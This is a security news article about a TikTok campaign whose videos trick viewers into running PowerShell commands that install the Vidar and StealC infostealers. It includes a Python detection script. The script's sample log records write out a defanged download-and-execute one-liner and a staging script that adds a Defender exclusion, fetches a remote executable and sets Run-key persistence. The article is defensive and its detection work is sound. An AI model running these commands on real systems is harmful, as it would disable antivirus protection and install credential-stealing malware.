TikTok videos lure users with pirated apps, deliver Vidar and StealC Malware

Fake videos promote a way of allegedly getting free Windows, Spotify, and other apps


On May 21, 2025, Trend Micro specialists uncovered[1] a sophisticated social engineering campaign exploiting TikTok to distribute the Vidar and StealC information-stealing malware. The tactic involves videos promising pirated apps, such as cracked versions of Windows OS, Microsoft Office, or Spotify, which entice users with free access to premium software.

These videos, potentially generated using AI tools, instruct viewers to execute harmful PowerShell commands disguised as activation steps. The campaign leverages TikTok’s vast user base and algorithmic reach, with one video amassing over half a million views, posing a significant threat to both individuals and businesses.

The ClickFix tactic,[2] as identified by Trend Micro, tricks users into running malicious scripts by presenting them as legitimate fixes or activation steps. The videos walk victims through opening PowerShell via the Win + R Run dialog and pasting a command that fetches and executes a script from a URL such as hxxps://allaivo[.]me/spotify. That script then creates hidden directories under the APPDATA and LOCALAPPDATA folders to stage the payload.

The scripts add those locations to Windows Defender's exclusion list so the dropped payload is never scanned, then download Vidar or StealC from domains like hxxps://amssh[.]co/file.exe. The malware establishes persistence through registry keys and connects to command-and-control (C&C) servers, with some C&C details hosted on legitimate platforms like Steam and Telegram, which makes the traffic harder to distinguish from ordinary activity and raises the risk of data exfiltration and credential theft.
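The chain described above leaves a recognisable footprint in PowerShell script-block logging (Windows event 4104, ScriptBlockText). As an added example, not code from the original article or from Trend Micro's research, the Python triage script below scores such log entries against those behaviours: download-and-execute pipelines, Defender exclusion changes, staging under APPDATA, hidden attributes, Run-key persistence and remote .exe fetches. The four log records are constructed for illustration (they reuse the two domains the article reports, in defanged form; real logs contain the undefanged URL), and the weights and the alert threshold are assumptions, not a vendor rule set.

```python
import re

# Behaviour rules for the ClickFix -> infostealer chain. PowerShell is
# case-insensitive, so every pattern is compiled with re.I. The URL patterns
# accept both live (http/https) and defanged (hxxp/hxxps) forms.
RULES = {
    # iwr/irm/DownloadString piped straight into iex on the same line
    "download_then_execute": re.compile(
        r"(?:invoke-webrequest|invoke-restmethod|\biwr\b|\birm\b|downloadstring)"
        r"[^\n]*\|\s*(?:iex\b|invoke-expression)", re.I),
    # adding a path/process/extension to the Defender exclusion list
    "defender_exclusion": re.compile(
        r"add-mppreference\s+-exclusion(?:path|process|extension)", re.I),
    # staging under %APPDATA% / %LOCALAPPDATA%
    "appdata_staging": re.compile(r"\$env:(?:local)?appdata|%(?:local)?appdata%", re.I),
    # marking the staging directory hidden
    "hidden_attribute": re.compile(r"attrib\s+\+h|\[io\.fileattributes\]::hidden", re.I),
    # persistence through the CurrentVersion\Run key
    "run_key_persistence": re.compile(r"currentversion\\run\b", re.I),
    # fetching an executable from a remote host
    "remote_executable": re.compile(r"h(?:tt|xx)ps?://[^\s'\"]+\.exe\b", re.I),
}

# Assumed weights: the two "smoking gun" behaviours alone cross the threshold.
WEIGHTS = {
    "download_then_execute": 3,
    "defender_exclusion": 3,
    "run_key_persistence": 2,
    "hidden_attribute": 1,
    "appdata_staging": 1,
    "remote_executable": 1,
}
ALERT_THRESHOLD = 3  # assumed

def score_script_block(text: str) -> dict:
    """Return the matched rule names, a weighted score and a verdict for one script block."""
    hits = [name for name, rx in RULES.items() if rx.search(text)]
    score = sum(WEIGHTS[h] for h in hits)
    verdict = "suspicious" if score >= ALERT_THRESHOLD else "benign"
    return {"hits": hits, "score": score, "verdict": verdict}

def triage(records: list[dict]) -> list[dict]:
    """Score a list of {record_id, script_block} entries (shape of event 4104 ScriptBlockText)."""
    return [{"record_id": r["record_id"], **score_script_block(r["script_block"])}
            for r in records]

# Constructed sample records. Records 1 and 2 mimic the first and second stage of
# the chain in the article; 3 and 4 are ordinary admin activity for contrast.
SAMPLE_EVENTS = [
    {"record_id": 1, "script_block": r"iwr hxxps://allaivo[.]me/spotify | iex"},
    {"record_id": 2, "script_block": r"""$d = "$env:APPDATA\Spotify"; New-Item -ItemType Directory -Path $d -Force | Out-Null
attrib +h $d
Add-MpPreference -ExclusionPath $d
iwr hxxps://amssh[.]co/file.exe -OutFile "$d\file.exe"
Set-ItemProperty -Path HKCU:\Software\Microsoft\Windows\CurrentVersion\Run -Name Spotify -Value "$d\file.exe"
Start-Process "$d\file.exe"
"""},
    {"record_id": 3, "script_block": r"Get-ChildItem $env:APPDATA\Code\User -Filter settings.json"},
    {"record_id": 4, "script_block": r"Invoke-WebRequest https://www.microsoft.com -OutFile page.html"},
]

if __name__ == "__main__":
    for result in triage(SAMPLE_EVENTS):
        print(f"record {result['record_id']}: {result['verdict']:<10} "
              f"score={result['score']} hits={result['hits']}")
```

The first stage scores on the download-and-execute pipeline alone; the second stage trips five separate rules even though it never pipes into iex, which is why the rules are scored together rather than requiring one signature. Adding an `-ExclusionPath` to Defender is rare enough in normal administration that it deserves a high weight on its own.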

Escalating risks on social media

This campaign shifts away from traditional malware delivery methods, such as fake CAPTCHA pages, by harnessing TikTok’s viral potential. As researchers from Trend Micro said:

Trend Research uncovered a new social engineering campaign using TikTok to deliver the Vidar and StealC information stealers. This attack uses videos (possibly AI-generated) to instruct users to execute PowerShell commands, which are disguised as software activation steps.

The use of AI enables attackers to rapidly produce tailored content, targeting diverse user groups and scaling the threat effectively. Businesses face risks of data breaches and credential theft, while individuals could lose personal information, necessitating urgent awareness efforts.

The campaign’s reliance on TikTok’s algorithmic reach[3] amplifies its impact, turning social media into a prime attack vector. This approach challenges traditional detection methods: the video itself carries no malicious code for content filters or antivirus to flag, since the malicious action is the command the viewer types into PowerShell.

With cybercriminals increasingly exploiting popular platforms, educating users to avoid suspicious instructions, especially from AI-driven content, becomes essential. The involvement of high-viewership accounts further complicates detection, as the content blends seamlessly with legitimate TikTok trends, heightening the danger for unsuspecting users.

Protecting yourself: steps to stay safe from TikTok malware

Users can protect themselves by avoiding unfamiliar commands from TikTok videos and sticking to official app sources. Trend Micro recommends installing robust antivirus software, keeping systems updated, and enabling real-time protection to detect and block Vidar and StealC.

If a device is compromised, users should immediately disconnect from the internet, run a full system scan, reset passwords from a secure device, and consider professional assistance to remove persistent malware. Because Vidar and StealC harvest saved browser credentials and session cookies, active sessions should be signed out and any multi-factor tokens re-enrolled as well. Regular backups and monitoring for unusual activity, such as unexpected network traffic, can also help mitigate damage.

Businesses should prioritize security awareness training, focusing on recognizing AI-generated social engineering tactics. As researchers from Trend Micro said:

Businesses can be affected by data exfiltration, credential theft, and potential compromise of sensitive systems as a result of this threat. Reinforcing security awareness, especially against AI-generated content, is crucial.

Network monitoring, restricting PowerShell to the users who need it (with script-block logging enabled where it stays allowed), auditing Windows Defender exclusion lists for unexpected entries, and periodic security audits lower the risk as well. Because this threat keeps evolving and rides on social media reach, proactive defences and threat detection tooling are essential to counter the growing wave of attacks against unsuspecting users.

About the author
Ugnius Kiguolis

Ugnius Kiguolis is a professional malware analyst who is also the founder and owner of 2-Spyware. He currently serves as Editor-in-chief.
